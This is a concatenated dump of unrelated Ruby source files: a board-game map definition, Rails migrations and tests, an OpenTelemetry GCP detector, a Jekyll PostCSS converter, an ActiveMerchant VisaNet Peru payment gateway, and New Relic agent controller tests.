'city=revenue:0;border=edge:1,type:impassable', %w[ F13 ] => 'city=revenue:0;label=Y;border=edge:1,type:impassable;border=edge:3,type:impassable;'\ 'border=edge:4,type:impassable', }, blue: { %w[ E0 ] => 'offboard=revenue:yellow_80|green_90|brown_100,groups:North0;'\ 'border=edge:1;border=edge:5', %w[ D1 ] => 'offboard=revenue:yellow_80|green_90|brown_100,groups:North0,hide:1;path=a:5,b:_0;'\ 'border=edge:1,type:divider;border=edge:4', %w[ F1 ] => 'offboard=revenue:yellow_80|green_90|brown_100,groups:North0,hide:1;path=a:1,b:_0;'\ 'offboard=revenue:yellow_80|green_90|brown_100,groups:North1,hide:1;path=a:0,b:_1;'\ 'partition=a:1,b:4,type:divider;border=edge:2;border=edge:5', %w[ C2 ] => 'offboard=revenue:yellow_80|green_90|brown_100,groups:North;path=a:0,b:_0;'\ 'border=edge:4,type:divider', %w[ G2 ] => 'offboard=revenue:yellow_80|green_90|brown_100,groups:North1;border=edge:2', %w[ I4 ] => 'offboard=revenue:yellow_80|green_100|brown_120,groups:NorthEast;path=a:1,b:_0;'\ 'border=edge:0', %w[ I6 ] => 'offboard=revenue:yellow_80|green_100|brown_120,groups:NorthEast,hide:1;path=a:2,b:_0;'\ 'offboard=revenue:yellow_60|green_90|brown_120,groups:East,hide:1;path=a:1,b:_1;'\ 'partition=a:2,b:5,type:divider;border=edge:3;border=edge:0', %w[ I8 ] => 'offboard=revenue:yellow_60|green_90|brown_120,groups:East;path=a:2,b:_0;'\ 'border=edge:3;border=edge:1', %w[ H9 ] => 'offboard=revenue:yellow_60|green_90|brown_120,groups:East,hide:1;path=a:3,b:_0;'\ 'border=edge:4;border=edge:0,type:divider', %w[ H11 ] => 'offboard=revenue:yellow_70|green_100|brown_130,groups:Denmark,hide:1;path=a:1,b:_0;'\ 'border=edge:0;border=edge:3,type:divider', %w[ H13 ] => 'offboard=revenue:yellow_70|green_100|brown_130,groups:Denmark;path=a:2,b:_0;'\ 'border=edge:3;border=edge:1', %w[ G14 ] => 'offboard=revenue:yellow_70|green_100|brown_130,groups:Denmark,hide:1;path=a:3,b:_0;'\ 'offboard=revenue:yellow_60|green_90|brown_120,groups:Holland,hide:1;path=a:2,b:_1;'\ 'border=edge:4;border=edge:1;partition=a:3,b:0,type:divider', %w[ F15 ] => 'offboard=revenue:yellow_70|green_100|brown_130,groups:Holland;path=a:3,b:_0;'\ 'border=edge:4', }, red: { %w[ A2 ] => 'offboard=revenue:yellow_40|green_90|brown_140,hide:1,groups:Midlands;path=a:5,b:_0;'\ 'border=edge:0', %w[ A4 ] => 'offboard=revenue:yellow_40|green_90|brown_140,hide:1,groups:Midlands;path=a:4,b:_0;path=a:5,b:_0;'\ 'border=edge:0;border=edge:3', %w[ A6 ] => 'offboard=revenue:yellow_40|green_90|brown_140,groups:Midlands;path=a:4,b:_0;path=a:5,b:_0;'\ 'border=edge:0;border=edge:3', %w[ A8 ] => 'offboard=revenue:yellow_40|green_90|brown_140,groups:Midlands,hide:1;path=a:4,b:_0;'\ 'offboard=revenue:yellow_70|green_100|brown_120,groups:West,hide:1;path=a:5,b:_1;'\ 'border=edge:0;border=edge:3;partition=a:2,b:5,type:divider', %w[ A10 ] => 'offboard=revenue:yellow_70|green_100|brown_120,groups:West;path=a:4,b:_0;path=a:5,b:_0;'\ 'border=edge:0;border=edge:3', %w[ A12 ] => 'offboard=revenue:yellow_100|green_150|brown_200,groups:London,hide:1;path=a:5,b:_0;'\ 'offboard=revenue:yellow_70|green_100|brown_120,groups:West,hide:1;path=a:4,b:_1;'\ 'border=edge:0;border=edge:3;partition=a:2,b:5,type:divider', %w[ A14 ] => 'offboard=revenue:yellow_100|green_150|brown_200,groups:London,hide:1;path=a:4,b:_0;'\ 'border=edge:5;border=edge:3', %w[ C14 ] => 'offboard=revenue:yellow_100|green_150|brown_200,groups:London;path=a:2,b:_0;path=a:3,b:_0;'\ 'path=a:4,b:_0;border=edge:5;border=edge:1', %w[ B15 ] => 'offboard=revenue:yellow_100|green_150|brown_200,groups:London,hide:1;path=a:3,b:_0;'\ 'border=edge:2;city=revenue:0,slots:2;border=edge:4', %w[ D15 ] => 'offboard=revenue:yellow_100|green_150|brown_200,groups:London,hide:1;path=a:3,b:_0;path=a:4,b:_0;'\ 'border=edge:2;city=revenue:0,slots:2', }, }.freeze LAYOUT = :flat end end end end
33.231933
117
0.396753
4a9cb78e1f2297058b7199e84f9133cba58b8294
756
# frozen_string_literal: true # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Auto-generated by gapic-generator-ruby. DO NOT EDIT! module Google module Cloud module Metastore VERSION = "0.1.0" end end end
28
74
0.744709
e9a8551bcae307ebb055257ea87ee73d42d7913b
176
class CreateTipos < ActiveRecord::Migration[5.0] def change create_table :tipos do |t| t.string :nome t.text :descricao t.timestamps end end end
16
48
0.642045
ed1af7cde0654aac5298c7b652346790a14cf876
2,636
# frozen_string_literal: true # Copyright The OpenTelemetry Authors # # SPDX-License-Identifier: Apache-2.0 require 'google-cloud-env' module OpenTelemetry module Resource module Detectors # GoogleCloudPlatform contains detect class method for determining gcp environment resource attributes module GoogleCloudPlatform extend self def detect # rubocop:disable Metrics/AbcSize, Metrics/CyclomaticComplexity, Metrics/MethodLength gcp_env = Google::Cloud::Env.new resource_attributes = {} if gcp_env.compute_engine? resource_attributes[OpenTelemetry::SemanticConventions::Resource::CLOUD_PROVIDER] = 'gcp' resource_attributes[OpenTelemetry::SemanticConventions::Resource::CLOUD_ACCOUNT_ID] = gcp_env.project_id resource_attributes[OpenTelemetry::SemanticConventions::Resource::CLOUD_REGION] = gcp_env.instance_attribute('cluster-location') resource_attributes[OpenTelemetry::SemanticConventions::Resource::CLOUD_AVAILABILITY_ZONE] = gcp_env.instance_zone resource_attributes[OpenTelemetry::SemanticConventions::Resource::HOST_ID] = gcp_env.lookup_metadata('instance', 'id') resource_attributes[OpenTelemetry::SemanticConventions::Resource::HOST_NAME] = ENV['HOSTNAME'] || gcp_env.lookup_metadata('instance', 'hostname') || safe_gethostname end if gcp_env.kubernetes_engine? resource_attributes[OpenTelemetry::SemanticConventions::Resource::K8S_CLUSTER_NAME] = gcp_env.instance_attribute('cluster-name') resource_attributes[OpenTelemetry::SemanticConventions::Resource::K8S_NAMESPACE_NAME] = gcp_env.kubernetes_engine_namespace_id resource_attributes[OpenTelemetry::SemanticConventions::Resource::K8S_POD_NAME] = ENV['HOSTNAME'] || safe_gethostname resource_attributes[OpenTelemetry::SemanticConventions::Resource::K8S_NODE_NAME] = gcp_env.lookup_metadata('instance', 'hostname') resource_attributes[OpenTelemetry::SemanticConventions::Resource::CONTAINER_NAME] = ENV['CONTAINER_NAME'] end resource_attributes.delete_if { |_key, value| value.nil? || value.empty? } OpenTelemetry::SDK::Resources::Resource.create(resource_attributes) end private def safe_gethostname Socket.gethostname rescue StandardError '' end end end end end
47.071429
142
0.67868
87085cf479f1287ba159f5d633706358ad73530c
634
module ActionView module Helpers module AssetTagHelper def image_tag_with_retina(source, options={}) retina = options.delete(:retina) if retina retina_source = source.to_s retina_source = retina_source.split('.') filename = retina_source.slice!(-2) retina_source = retina_source.insert(-2, "#{filename}@2x").join('.') options[:data] ||= {} options[:data].merge!(:at2x => path_to_image(retina_source)) end image_tag_without_retina(source, options) end alias_method_chain :image_tag, :retina end end end
25.36
78
0.613565
7ab588f5a6d69f44b79150a7139d690499fe5e93
701
require 'test_helper' class MicropostTest < ActiveSupport::TestCase def setup @user = users(:john) @micropost = @user.microposts.build(content: "Lorem ipsum") end test "should be valid" do assert @micropost.valid? end test "user id should be present" do @micropost.user_id = nil assert_not @micropost.valid? end test "content should be present " do @micropost.content = " " assert_not @micropost.valid? end test "content should be at most 140 characters" do @micropost.content = "a" * 141 assert_not @micropost.valid? end test "order should be most recent first" do assert_equal Micropost.first, microposts(:most_recent) end end
21.90625
63
0.693295
e874263f99b85dffbecfeac6824828a1ec9334bb
1,675
# frozen_string_literal: true require "digest" require_relative "../../jekyll-postcss/socket" module Jekyll module Converters class PostCss < Converter safe true priority :normal def initialize(config = {}) super @socket = config.fetch("socket") { ::PostCss::Socket.new } @raw_cache = nil @import_raw_cache = {} @converted_cache = nil end def matches(ext) [".css", ".scss", ".sass"].include?(ext.downcase) end def output_ext(ext) ext end def convert(content) raise PostCssNotFoundError unless Dir.exist?("./node_modules/postcss") @raw_digest = Digest::MD5.hexdigest content @raw_import_digests = import_digests(content) if cache_miss.any? @raw_cache = @raw_digest.dup @import_raw_cache = @raw_import_digests.dup @socket.write content @converted_cache = @socket.read end reset @converted_cache end private def import_digests(content) content .scan(%r!^@import "(?<file>.*)";$!) .flatten .each_with_object({}) do |import, acc| file = "#{import}.css" acc[import] = Digest::MD5.hexdigest IO.read(file) if File.file?(file) end end def cache_miss @raw_import_digests .map { |import, hash| @import_raw_cache[import] != hash } .unshift(@raw_cache != @raw_digest) end def reset @raw_digest = nil @raw_import_digest = nil end end end end class PostCssNotFoundError < RuntimeError; end
22.039474
81
0.575522
26bf0ec918b29f0627786ce66bd3ec67e7580644
158
def sign_in_as(user) visit new_user_session_path fill_in 'Email', with: user.email fill_in 'Password', with: user.password click_button 'Sign in' end
22.571429
41
0.759494
28b6620d91a3416978dbd56c6c34bbfaafa4b4f9
1,346
require 'spec_helper' describe 'duo_unix::repo' do on_supported_os.each do |os, os_facts| context "on #{os}" do let(:facts) { os_facts } it { is_expected.to compile.with_all_deps } if os =~ %r{/ubuntu.*/} if os != 'ubuntu-18.04-x86_64' it { is_expected.to contain_apt__source('duosecurity') .with_location('https://pkg.duosecurity.com/Ubuntu') .with_architecture('i386,amd64') } end if os == 'ubuntu-18.04-x86_64' it { is_expected.to contain_apt__source('duosecurity') .with_location('https://pkg.duosecurity.com/Ubuntu') .with_release('bionic') .with_repos('main') .with_architecture('amd64') } end end if os =~ %r{/debian.*/} it { is_expected.to contain_apt__source('duosecurity').with_location('https://pkg.duosecurity.com/Debian') } end if os =~ %r{/redhat.*/} it { is_expected.to contain_yumrepo('duosecurity').with_baseurl('https://pkg.duosecurity.com/RedHat/$releasever/$basearch') } end if os =~ %r{/centos.*/} it { is_expected.to contain_yumrepo('duosecurity').with_baseurl('https://pkg.duosecurity.com/CentOS/$releasever/$basearch') } end end end end
29.26087
133
0.580981
d5f27a63ef9d52207598d9c913adc0f0f5a41e75
8,640
module ActiveMerchant #:nodoc: module Billing #:nodoc: class VisanetPeruGateway < Gateway include Empty self.display_name = 'VisaNet Peru Gateway' self.homepage_url = 'http://www.visanet.com.pe' self.test_url = 'https://devapi.vnforapps.com/api.tokenization/api/v2/merchant' self.live_url = 'https://api.vnforapps.com/api.tokenization/api/v2/merchant' self.supported_countries = ['US', 'PE'] self.default_currency = 'PEN' self.money_format = :dollars self.supported_cardtypes = [:visa, :master, :american_express, :discover] def initialize(options={}) requires!(options, :access_key_id, :secret_access_key, :merchant_id) super end def purchase(amount, payment_method, options={}) MultiResponse.run() do |r| r.process { authorize(amount, payment_method, options) } r.process { capture(amount, r.authorization, options) } end end def authorize(amount, payment_method, options={}) params = {} add_invoice(params, amount, options) add_payment_method(params, payment_method) add_antifraud_data(params, options) params[:email] = options[:email] || '[email protected]' params[:createAlias] = false commit('authorize', params, options) end def capture(amount, authorization, options={}) params = {} options[:id_unico] = split_authorization(authorization)[1] add_auth_order_id(params, authorization, options) commit('deposit', params, options) end def void(authorization, options={}) params = {} add_auth_order_id(params, authorization, options) commit('void', params, options) end def refund(amount, authorization, options={}) params = {} params[:amount] = amount(amount) if amount add_auth_order_id(params, authorization, options) response = commit('cancelDeposit', params, options) return response if response.success? || split_authorization(authorization).length == 1 || !options[:force_full_refund_if_unsettled] # Attempt RefundSingleTransaction if unsettled (and stash the original # response message so it will be included it in the follow-up response # message) options[:error_message] = response.message prepare_refund_data(params, authorization, options) commit('refund', params, options) end def verify(credit_card, options={}) MultiResponse.run(:use_first_response) do |r| r.process { authorize(100, credit_card, options) } r.process(:ignore_result) { void(r.authorization, options) } end end def supports_scrubbing? true end def scrub(transcript) transcript. gsub(%r((Authorization: Basic )\w+), '\1[FILTERED]'). gsub(%r((\"cardNumber\\\":\\\")\d+), '\1[FILTERED]'). gsub(%r((\"cvv2Code\\\":\\\")\d+), '\1[FILTERED]') end private CURRENCY_CODES = Hash.new { |h, k| raise ArgumentError.new("Unsupported currency: #{k}") } CURRENCY_CODES['USD'] = 840 CURRENCY_CODES['PEN'] = 604 def add_invoice(params, money, options) # Visanet Peru expects a 9-digit numeric purchaseNumber params[:purchaseNumber] = (SecureRandom.random_number(900_000_000) + 100_000_000).to_s params[:externalTransactionId] = options[:order_id] params[:amount] = amount(money) params[:currencyId] = CURRENCY_CODES[options[:currency] || currency(money)] end def add_auth_order_id(params, authorization, options) purchase_number, _ = split_authorization(authorization) params[:purchaseNumber] = purchase_number params[:externalTransactionId] = options[:order_id] end def add_payment_method(params, payment_method) params[:firstName] = payment_method.first_name params[:lastName] = payment_method.last_name params[:cardNumber] = payment_method.number params[:cvv2Code] = payment_method.verification_value params[:expirationYear] = format(payment_method.year, :four_digits) params[:expirationMonth] = format(payment_method.month, :two_digits) end def add_antifraud_data(params, options) antifraud = {} if billing_address = options[:billing_address] || options[:address] antifraud[:billTo_street1] = billing_address[:address1] antifraud[:billTo_city] = billing_address[:city] antifraud[:billTo_state] = billing_address[:state] antifraud[:billTo_country] = billing_address[:country] antifraud[:billTo_postalCode] = billing_address[:zip] end antifraud[:deviceFingerprintId] = options[:device_fingerprint_id] || SecureRandom.hex(16) antifraud[:merchantDefineData] = options[:merchant_define_data] if options[:merchant_define_data] params[:antifraud] = antifraud end def prepare_refund_data(params, authorization, options) params.delete(:purchaseNumber) params[:externalReferenceId] = params.delete(:externalTransactionId) _, transaction_id = split_authorization(authorization) options.update(transaction_id: transaction_id) params[:ruc] = options[:ruc] end def split_authorization(authorization) authorization.split('|') end def commit(action, params, options={}) raw_response = ssl_request(method(action), url(action, params, options), params.to_json, headers) response = parse(raw_response) rescue ResponseError => e raw_response = e.response.body response_error(raw_response, options, action) rescue JSON::ParserError unparsable_response(raw_response) else Response.new( success_from(response), message_from(response, options, action), response, :test => test?, :authorization => authorization_from(params, response, options), :error_code => response['errorCode'] ) end def headers { 'Authorization' => 'Basic ' + Base64.strict_encode64("#{@options[:access_key_id]}:#{@options[:secret_access_key]}").strip, 'Content-Type' => 'application/json' } end def url(action, params, options={}) if action == 'authorize' "#{base_url}/#{@options[:merchant_id]}" elsif action == 'refund' "#{base_url}/#{@options[:merchant_id]}/#{action}/#{options[:transaction_id]}" else "#{base_url}/#{@options[:merchant_id]}/#{action}/#{params[:purchaseNumber]}" end end def method(action) %w(authorize refund).include?(action) ? :post : :put end def authorization_from(params, response, options) id_unico = response['data']['ID_UNICO'] || options[:id_unico] "#{params[:purchaseNumber]}|#{id_unico}" end def base_url test? ? test_url : live_url end def parse(body) JSON.parse(body) end def success_from(response) response['errorCode'] == 0 end def message_from(response, options, action) message_from_messages( response['errorMessage'], action_code_description(response), options[:error_message] ) end def message_from_messages(*args) args.reject { |m| error_message_empty?(m) }.join(' | ') end def action_code_description(response) return nil unless response['data'] response['data']['DSC_COD_ACCION'] end def error_message_empty?(error_message) empty?(error_message) || error_message == '[ ]' end def response_error(raw_response, options, action) response = parse(raw_response) rescue JSON::ParserError unparsable_response(raw_response) else return Response.new( false, message_from(response, options, action), response, :test => test?, :authorization => response['transactionUUID'], :error_code => response['errorCode'] ) end def unparsable_response(raw_response) message = 'Invalid JSON response received from VisanetPeruGateway. Please contact VisanetPeruGateway if you continue to receive this message.' message += " (The raw response returned by the API was #{raw_response.inspect})" return Response.new(false, message) end end end end
34.979757
150
0.636574
e979a39f833d9e034cd9ef34ce0ace39445286fe
387
# frozen_string_literal: true require 'forwardable' require_relative 'utils' module OpenapiFirst # Represents an OpenAPI Response Object class ResponseObject extend Forwardable def_delegators :@parsed, :content def_delegators :@raw, :[] def initialize(parsed) @parsed = parsed @raw = parsed.raw end end end
17.590909
41
0.638243
21bb707df71ba758ecfd257d2603ad82d162020b
75
class EvidenceType < ApplicationRecord validates_presence_of :title end
15
38
0.84
082ba48aa6c5129b5f14895924a0bfb7d99a99fc
47
module StellarSpectrum VERSION = "1.3.1" end
11.75
22
0.723404
0322b82cc78922ca3f577762a7b10300cf954c6a
15,946
require File.expand_path(File.join(File.dirname(__FILE__),'..','..','test_helper')) require 'action_controller/test_case' class NewRelic::Agent::AgentTestControllerTest < ActionController::TestCase require 'action_controller/base' require 'new_relic/agent/agent_test_controller' self.controller_class = NewRelic::Agent::AgentTestController attr_accessor :agent, :engine def test_initialization # Suggested by cee-dub for merb tests. I'm actually amazed if our tests work with merb. if defined?(Merb::Router) Merb::Router.prepare do |r| match('/:controller(/:action)(.:format)').register end elsif NewRelic::Control.instance.rails_version < NewRelic::VersionNumber.new("3.0") ActionController::Routing::Routes.draw do |map| map.connect '/:controller/:action.:format' map.connect '/:controller/:action' end else Rails.application.routes.draw do match '/:controller/:action.:format' match '/:controller/:action' end end if defined?(Rails) && Rails.respond_to?(:application) && Rails.application.respond_to?(:routes) @routes = Rails.application.routes end Thread.current[:newrelic_ignore_controller] = nil NewRelic::Agent.manual_start @agent = NewRelic::Agent.instance # @agent.instrument_app agent.transaction_sampler.harvest NewRelic::Agent::AgentTestController.class_eval do newrelic_ignore :only => [:action_to_ignore, :entry_action, :base_action] newrelic_ignore_apdex :only => :action_to_ignore_apdex end @engine = @agent.stats_engine end # Normally you can do this with #setup but for some reason in rails 2.0.2 # setup is not called. if NewRelic::Control.instance.rails_version <= '2.1.0' def initialize name super name test_initialization end else alias_method :setup, :test_initialization end def teardown Thread.current[:newrelic_ignore_controller] = nil NewRelic::Agent.shutdown NewRelic::Agent::AgentTestController.clear_headers super end def test_mongrel_queue NewRelic::Agent::AgentTestController.clear_headers engine.clear_stats NewRelic::Control.instance.local_env.stubs(:mongrel).returns( stub('mongrel', :workers => stub('workers', :list => stub('list', :length => '10')))) get :index assert_equal 1, stats('HttpDispatcher').call_count assert_equal 1, engine.get_stats_no_scope('Mongrel/Queue Length').call_count assert_equal 9, engine.get_stats_no_scope('Mongrel/Queue Length').total_call_time assert_equal 0, engine.get_stats_no_scope('WebFrontend/Mongrel/Average Queue Time').call_count end def test_heroku_queue engine.clear_stats NewRelic::Agent::AgentTestController.set_some_headers 'HTTP_X_HEROKU_QUEUE_DEPTH'=>'15' get :index assert_equal 1, stats('HttpDispatcher').call_count assert_equal 1, engine.get_stats_no_scope('Mongrel/Queue Length').call_count assert_equal 15, engine.get_stats_no_scope('Mongrel/Queue Length').total_call_time assert_equal 0, engine.get_stats_no_scope('WebFrontend/Mongrel/Average Queue Time').call_count end def test_new_queue_integration # make this test deterministic Time.stubs(:now => Time.at(2)) NewRelic::Agent::AgentTestController.clear_headers engine.clear_stats start = ((Time.now - 1).to_f * 1_000_000).to_i NewRelic::Agent::AgentTestController.set_some_headers 'HTTP_X_QUEUE_START'=> "t=#{start}" get :index check_metric_time('WebFrontend/QueueTime', 1, 0.1) end def test_new_middleware_integration # make this test deterministic Time.stubs(:now => Time.at(2)) engine.clear_stats start = ((Time.now - 1).to_f * 1_000_000).to_i NewRelic::Agent::AgentTestController.set_some_headers 'HTTP_X_MIDDLEWARE_START'=> "t=#{start}" get :index check_metric_time('Middleware/all', 1, 0.1) end def test_new_server_time_integration # make this test deterministic Time.stubs(:now => Time.at(2)) NewRelic::Agent::AgentTestController.clear_headers engine.clear_stats start = ((Time.now - 1).to_f * 1_000_000).to_i NewRelic::Agent::AgentTestController.set_some_headers 'HTTP_X_REQUEST_START'=> "t=#{start}" get :index check_metric_time('WebFrontend/WebServer/all', 1, 0.1) end def test_new_frontend_work_integration # make this test deterministic Time.stubs(:now => Time.at(10)) engine.clear_stats times = [Time.now - 3, Time.now - 2, Time.now - 1] times.map! {|t| (t.to_f * 1_000_000).to_i } NewRelic::Agent::AgentTestController.set_some_headers({ 'HTTP_X_REQUEST_START'=> "t=#{times[0]}", 'HTTP_X_QUEUE_START' => "t=#{times[1]}", 'HTTP_X_MIDDLEWARE_START' => "t=#{times[2]}"}) get :index check_metric_time('WebFrontend/WebServer/all', 1, 0.1) check_metric_time('Middleware/all', 1, 0.1) check_metric_time('WebFrontend/QueueTime', 1, 0.1) end def test_render_inline engine.clear_stats get :action_inline assert_equal 'foofah', @response.body compare_metrics %w[Controller/new_relic/agent/agent_test/action_inline], engine.metrics.grep(/^Controller/) end def test_metric__ignore engine.clear_stats compare_metrics [], engine.metrics get :action_to_ignore compare_metrics [], engine.metrics end def test_controller_rescued_error engine.clear_stats assert_raise RuntimeError do get :action_with_error end metrics = ['Apdex', 'Apdex/new_relic/agent/agent_test/action_with_error', 'HttpDispatcher', 'Controller/new_relic/agent/agent_test/action_with_error', 'Errors/all', 'Middleware/all', 'WebFrontend/WebServer/all', 'WebFrontend/QueueTime'] compare_metrics metrics, engine.metrics.reject{|m| m.index('Response')==0 || m.index('CPU')==0} assert_equal 1, engine.get_stats_no_scope("Controller/new_relic/agent/agent_test/action_with_error").call_count assert_equal 1, engine.get_stats_no_scope("Errors/all").call_count apdex = engine.get_stats_no_scope("Apdex") score = apdex.get_apdex assert_equal 1, score[2], 'failing' assert_equal 0, score[1], 'tol' assert_equal 0, score[0], 'satisfied' end def test_controller_error engine.clear_stats assert_raise RuntimeError do get :action_with_error end metrics = ['Apdex', 'Apdex/new_relic/agent/agent_test/action_with_error', 'HttpDispatcher', 'Controller/new_relic/agent/agent_test/action_with_error', 'Errors/all', 'WebFrontend/QueueTime', 'Middleware/all', 'WebFrontend/WebServer/all'] compare_metrics metrics, engine.metrics.reject{|m| m.index('Response')==0 || m.index('CPU')==0} assert_equal 1, engine.get_stats_no_scope("Controller/new_relic/agent/agent_test/action_with_error").call_count assert_equal 1, engine.get_stats_no_scope("Errors/all").call_count apdex = engine.get_stats_no_scope("Apdex") score = apdex.get_apdex assert_equal 1, score[2], 'failing' assert_equal 0, score[1], 'tol' assert_equal 0, score[0], 'satisfied' end def test_filter_error engine.clear_stats assert_raise RuntimeError do get :action_with_before_filter_error end metrics = ['Apdex', 'Apdex/new_relic/agent/agent_test/action_with_before_filter_error', 'HttpDispatcher', 'Controller/new_relic/agent/agent_test/action_with_before_filter_error', 'Errors/all', 'WebFrontend/QueueTime', 'Middleware/all', 'WebFrontend/WebServer/all'] compare_metrics metrics, engine.metrics.reject{|m| m.index('Response')==0 || m.index('CPU')==0 || m.index('GC')==0} assert_equal 1, engine.get_stats_no_scope("Controller/new_relic/agent/agent_test/action_with_before_filter_error").call_count assert_equal 1, engine.get_stats_no_scope("Errors/all").call_count apdex = engine.get_stats_no_scope("Apdex") score = apdex.get_apdex assert_equal 1, score[2], 'failing' assert_equal 0, score[1], 'tol' assert_equal 0, score[0], 'satisfied' end def test_metric__ignore_base engine.clear_stats get :base_action compare_metrics [], engine.metrics end def test_metric__no_ignore path = 'new_relic/agent/agent_test/index' index_stats = stats("Controller/#{path}") index_apdex_stats = engine.get_custom_stats("Apdex/#{path}", NewRelic::ApdexStats) assert_difference 'index_stats.call_count' do assert_difference 'index_apdex_stats.call_count' do get :index end end assert_nil Thread.current[:newrelic_ignore_controller] end def test_metric__ignore_apdex engine = @agent.stats_engine path = 'new_relic/agent/agent_test/action_to_ignore_apdex' cpu_stats = stats("ControllerCPU/#{path}") index_stats = stats("Controller/#{path}") index_apdex_stats = engine.get_custom_stats("Apdex/#{path}", NewRelic::ApdexStats) assert_difference 'index_stats.call_count' do assert_no_difference 'index_apdex_stats.call_count' do get :action_to_ignore_apdex end end assert_nil Thread.current[:newrelic_ignore_controller] end def test_metric__dispatched engine = @agent.stats_engine get :entry_action assert_nil Thread.current[:newrelic_ignore_controller] assert_nil engine.lookup_stats('Controller/agent_test/entry_action') assert_nil engine.lookup_stats('Controller/agent_test_controller/entry_action') assert_nil engine.lookup_stats('Controller/AgentTestController/entry_action') assert_nil engine.lookup_stats('Controller/NewRelic::Agent::AgentTestController/internal_action') assert_nil engine.lookup_stats('Controller/NewRelic::Agent::AgentTestController_controller/internal_action') assert_not_nil engine.lookup_stats('Controller/NewRelic::Agent::AgentTestController/internal_traced_action') end def test_action_instrumentation get :index, :foo => 'bar' assert_match /bar/, @response.body end def test_controller_params assert agent.transaction_sampler num_samples = NewRelic::Agent.instance.transaction_sampler.samples.length assert_equal "[FILTERED]", @controller._filter_parameters({'social_security_number' => 'test'})['social_security_number'] get :index, 'social_security_number' => "001-555-1212" samples = agent.transaction_sampler.samples assert_equal num_samples + 1, samples.length assert_equal "[FILTERED]", samples.last.params[:request_params]["social_security_number"] end def test_controller_params agent.transaction_sampler.reset! get :index, 'number' => "001-555-1212" s = with_config(:'transaction_tracer.transaction_threshold' => 0.0) do agent.transaction_sampler.harvest(nil) end assert_equal 1, s.size assert_equal 5, s.first.params.size end def test_busy_calculation_correctly_calculates_based_acccumlator # woah it's 1970 now = Time.at 0 # We'll record two seconds of transactions later = Time.at(now + 2) NewRelic::Agent::BusyCalculator.stubs(:time_now). returns(now).then.returns(later) # reset harvest time to epoch (based on stub) NewRelic::Agent::BusyCalculator.reset # We record 1 second of busy time in our two seconds of wall clock NewRelic::Agent::BusyCalculator.instance_variable_set(:@accumulator, 1.0) NewRelic::Agent::BusyCalculator.harvest_busy # smooth out floating point math stat_int = (stats('Instance/Busy').total_call_time * 10).to_i # Despite your expectations, #total_call_time is a percentage here. assert_equal(stat_int, 5, "#{stats('Instance/Busy').total_call_time} != 0.5") end def test_busy_calculation_generates_a_positive_value engine.clear_stats get :index, 'social_security_number' => "001-555-1212", 'wait' => '0.05' NewRelic::Agent::BusyCalculator.harvest_busy assert_equal 1, stats('Instance/Busy').call_count assert_equal 1, stats('HttpDispatcher').call_count # Timing is too non-deterministic, so we just assert a positive, non-zero # value here. See # #test_busy_calculation_correctly_calculates_based_acccumlator for # assertions that the formula is correct. assert(stats('Instance/Busy').total_call_time > 0, "#{stats('Instance/Busy').total_call_time} !> 0") assert_equal 0, stats('WebFrontend/Mongrel/Average Queue Time').call_count end def test_queue_headers_no_header engine.clear_stats queue_length_stat = stats('Mongrel/Queue Length') queue_time_stat = stats('WebFrontend/QueueTime') # no request start header get 'index' assert_equal 0, queue_length_stat.call_count end def test_queue_headers_apache # make this test deterministic Time.stubs(:now => Time.at(10)) NewRelic::Agent::AgentTestController.clear_headers engine.clear_stats queue_length_stat = stats('Mongrel/Queue Length') queue_time_stat = stats('WebFrontend/QueueTime') # apache version of header request_start = ((Time.now.to_f - 0.5) * 1e6).to_i.to_s NewRelic::Agent::AgentTestController.set_some_headers({'HTTP_X_QUEUE_START' => "t=#{request_start}"}) get :index assert_equal(0, queue_length_stat.call_count, 'We should not be seeing a queue length yet') assert_equal(1, queue_time_stat.call_count, 'We should have seen the queue header once') assert(queue_time_stat.total_call_time > 0.1, "Queue time should be longer than 100ms") assert(queue_time_stat.total_call_time < 10, "Queue time should be under 10 seconds (sanity check)") end def test_queue_headers_heroku # make this test deterministic Time.stubs(:now => Time.at(10)) engine.clear_stats NewRelic::Agent::AgentTestController.clear_headers queue_length_stat = stats('Mongrel/Queue Length') queue_time_stat = stats('WebFrontend/QueueTime') # heroku version request_start = ((Time.now.to_f - 0.5) * 1e6).to_i.to_s NewRelic::Agent::AgentTestController.set_some_headers({'HTTP_X_QUEUE_START' => "t=#{request_start}", 'HTTP_X_HEROKU_QUEUE_DEPTH' => '0'}) get :index assert_equal(0, queue_length_stat.total_call_time, 'queue should be empty') assert_equal(1, queue_time_stat.call_count, 'should have seen the queue header once') assert(queue_time_stat.total_call_time > 0.1, "Queue time should be longer than 100ms") assert(queue_time_stat.total_call_time < 10, "Queue time should be under 10 seconds (sanity check)") end def test_queue_headers_heroku_queue_length # make this test deterministic Time.stubs(:now => Time.at(10)) engine.clear_stats NewRelic::Agent::AgentTestController.clear_headers queue_length_stat = stats('Mongrel/Queue Length') queue_time_stat = stats('WebFrontend/QueueTime') # heroku version with queue length > 0 request_start = ((Time.now.to_f - 0.5) * 1e6).to_i.to_s NewRelic::Agent::AgentTestController.set_some_headers({'HTTP_X_QUEUE_START' => "t=#{request_start}", 'HTTP_X_HEROKU_QUEUE_DEPTH' => '3'}) get :index assert_equal(1, queue_length_stat.call_count, 'queue should have been seen once') assert_equal(1, queue_time_stat.call_count, 'should have seen the queue header once') assert(queue_time_stat.total_call_time > 0.1, "Queue time should be longer than 100ms") assert(queue_time_stat.total_call_time < 10, "Queue time should be under 10 seconds (sanity check)") assert_equal(3, queue_length_stat.total_call_time, 'queue should be 3 long') NewRelic::Agent::AgentTestController.clear_headers end private def stats(name) engine.get_stats_no_scope(name) end end if defined? Rails
38.424096
189
0.717108
39558ae43caa9021300a3d6206f81504c52a3595
10,339
